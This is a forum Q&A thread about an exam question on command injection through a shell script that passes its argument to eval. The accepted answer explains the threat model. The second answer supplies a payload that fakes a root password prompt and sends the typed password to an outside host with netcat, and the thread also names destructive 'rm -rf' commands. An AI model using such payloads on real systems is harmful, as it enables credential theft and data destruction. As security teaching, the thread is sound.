Creative vulnerabilities in unix eval command

Question

I'm reading through past exams for an information security subject and I came across this.

#!/bin/sh
#applications launcher
X=$1
eval "$X"

"Do you think the program is vulnerable to attacks? Explain the reason for your answer with an example."

Simple program, obvious vulnerability.

The only example I could answer with (unix programming skill = 0) is that the user input can contain unix commands to cause harm to the system, something like rm -rf /

I would liken this to answering a question about SQL injection and using an example that says DROP TABLE *. It's a legitimate example of the vulnerability but its a boring example.

Unix programmers/security experts. What are some more fun/creative examples for answering this question?

Have you seen this: http://mywiki.wooledge.org/BashFAQ/048 ? — lorenzog, Jun 12 '14 at 14:20

score 6 · Accepted Answer · answered Jun 12 '14 at 15:53

I think you've missed the point of this question. Given the wording of the question, the person who set the exam might not have been very clear on the threat model, unless there's some additional introduction material for this question that you didn't quote and that provides more context.

What you posted is a program which takes one argument, a string, and executes this string as a shell (/bin/sh) program.

The key point is in what context this program is called. There are plenty of programs that execute their argument as a shell program or as an external command, starting with sh itself.

If the program is called in the same security boundary as the entity that decides the argument, there is no security implication since no security barrier is crossed.

If the argument is chosen by an entity outside the security boundary that runs the program (for example, if the program is executed with extra privileges through sudo, or if the argument is read from an external user over the network), then this is a trivial injection. There's no need to be creative: you can put absolutely any code you like in there (you just need to express it in shell syntax). You can access all the files of the user who is running the program, modify them and add new ones, execute whatever programs you want, make use of any available network connection, etc.

Whenever you can execute arbitrary code in a privileged context, you've won. rm -rf / is actually not going to work unless the program is running as root on a system which doesn't have ad hoc rm -rf / prevention. Something like rm -rf ~ (remove all the files in the user's home) would be more useful if you want to cause harm. But usually attackers are after more productive things, such as reading the files stored on this account or the databases that it has access to, planting a backdoor to be able to regain access later, sending spam or generating bitcoins, and so on.

That makes a great deal of sense. You mention arguments being input by external users. In this exact program (or in unix), is that possible? — pjmil, Jun 14 '14 at 02:43
if you're around, I'm still interested in clarifiying a few things. @Gilles — pjmil, Jun 14 '14 at 10:21
@pjmil116 Whether input can come from external users depends on how the program is invoked, not on what the program does. — Gilles 'SO- stop being evil', Jun 14 '14 at 11:58

score 3 · Answer 2 · answered Jun 12 '14 at 13:33

"stty -echo ; echo 'This program requires root privileges.' ; read -p 'Please enter password: ' password ; echo \$password | netcat myhost.foo 1337 ; stty echo"

You have to listen on port 1337 on your machine:

netcat -l 1337

and will be sent the root password of the victim machine (if the user is stupid enough...).

Creative vulnerabilities in unix eval command

2 Answers2